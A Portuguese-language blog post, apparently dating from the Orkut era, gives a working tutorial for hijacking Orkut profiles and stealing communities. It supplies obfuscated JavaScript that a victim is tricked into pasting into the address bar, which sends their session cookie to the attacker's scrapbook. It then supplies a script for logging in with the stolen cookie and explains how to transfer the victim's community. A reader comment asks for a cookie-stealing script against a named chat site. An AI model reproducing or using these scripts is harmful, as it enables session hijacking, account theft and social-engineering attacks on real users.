Invadindo Profiles
Primeiramente defasar profiles e roubar comunidades sem motivo eu acho uma grande idiotice, a pessoa tem um grande trabalho pra encher sua comunidade de gente pra chegar um e roubá-la, sem comentários. Mas como o que mais chama atenção em sites, fóruns, comunidades, etc é o assunto de senhas, invasão e assuntos do gênero ta aew.
Mais uma vez vou explicar como se aproveitar de um bug do Orkut para invadir profiles e roubar comunidades,lembrando que existem vários outros.
Quem quiser seus cookies bem organizados em banco de dados pode usar o cookie monster de autoria do Xis Nove que pode ser encontrado em seu site www.dicasetruques.110mb.com ou na parte de downloads, mas aqui vamos usar o javascript para roubar cookies que atualmente esta funcionando,mas ja vo avisando quase ninguem cai nessa mais não.
Primeiramente clique em ver perfil no perfil que ira receber os cookies e utilize o seguinte javascript para pegar seu GID:
javascript:void(prompt('',document.body.innerHTML.match(/http:\/\/\w+.orkut.com\/images\/\w+\/\d+\/([0-9]+).jpg/gi).toString().replace(/http:\/\/\w+.orkut.com\/images\/\w+\/\d+\/([0-9]+).jpg/gi,'$1')))
Copie somente os 8 primeiro numeros que estão atras da virgula.
Agora coloque esse numero no seguinte javascript substituindo os numeros em amarelo
javascript:nobody=replyForm;nobody.toUserId.value=33495384;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));nobody.action='Scrapbook.aspx?Action.submit';nobody.submit()
Então se por exemplo seu GID for 12345678 ficara assim:
javascript:nobody=replyForm;nobody.toUserId.value=12345678;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));nobody.action='Scrapbook.aspx?Action.submit';nobody.submit()
Envie esse código pra vitima e peça para que ela coloque na barra de endereços (onde se escreve www.orkut.com) e execute.Lembrando que só ira chegar os cookie inteiros de quem usa o navegador Mozila Firefox.
Agora que você já tem o cookie para se logar com eles use o javascript a seguir:
javascript:function logaCookie(value){var newCookie="orkut_state="+value+";domain=.orkut.com";document.cookie=newCookie;location="Home.aspx"};state=prompt('Coloque os biscoitos do Cidadao','');logaCookie(state);void(0)
Um cookie estará assim no seguinte esquema:
ORKUTPREF=ID=7069351988147316884:INF=0:SET=111236436:LNG=79:CNT=0:RM=0:USR=ZmFrZV8xMl9mYWtlXzEyQHlhaG9vLmNvbS5icg==:PHS=:TS=1181475597:LCL=pt-BR:NET=1:TOS=2147483647:GC=DQAAAnkkjhkhU_PAvfGVmb6iRF6VPVvHEoTK8mKFqUTwPtGgZfeUE-TJH9ZFJ6h2vdFR_dXDgqz6237XHbreKaS6f3lbuUcc6n-FKi484Fd0SgEq3sKtHXVs-MFcOJhmbSmiJnYKnH5hc7ttcCeVY5udrIWHxd9Zjs0rfmr9BWTEjMRD7Q:PE=ZmFrZV8xMl9mYWtlXzEyQHlhaG9vLmNvbS5icg==:GTI=0:GID=:VER=2:S=bj+6NisC7TewtkGC0i2VsPUHZVw=:
Depois de logado no cookie da vítima para transferir uma comunidade:
Logue no perfil que ira receber os cookies e em seguida coloque os cookies da vitima.
Va na comunidade a ser roubada procure o perfil que ira receber a comunidade clique em gerenciar e transferir comunidade para o usuario.Ira pedir a senha vc naum sabe então coloque qualquer senha ira cair na página de login coloque sua senha logue e pronto comunidade transferida.
qualquer coiza CLIQUE AQUI para ver no site q eu tirei!!!
2 comentários:
queria saber se vcs poderiam esclarecer uma duvida minha eu entro num site q tem uma opçao de conversar em reservado ai qria se tem algum script de roubar cookies para q eu possa ver o reservado dos usuarios
nota:graças a erros eu posso executar qualqer script na sala
http://inchat2.insite.com.br/mod_perl/inchat/inchat.pl?acao=login&room=58
naum precisa de um editor de cookies do firefox, instalado
valeu
Postar um comentário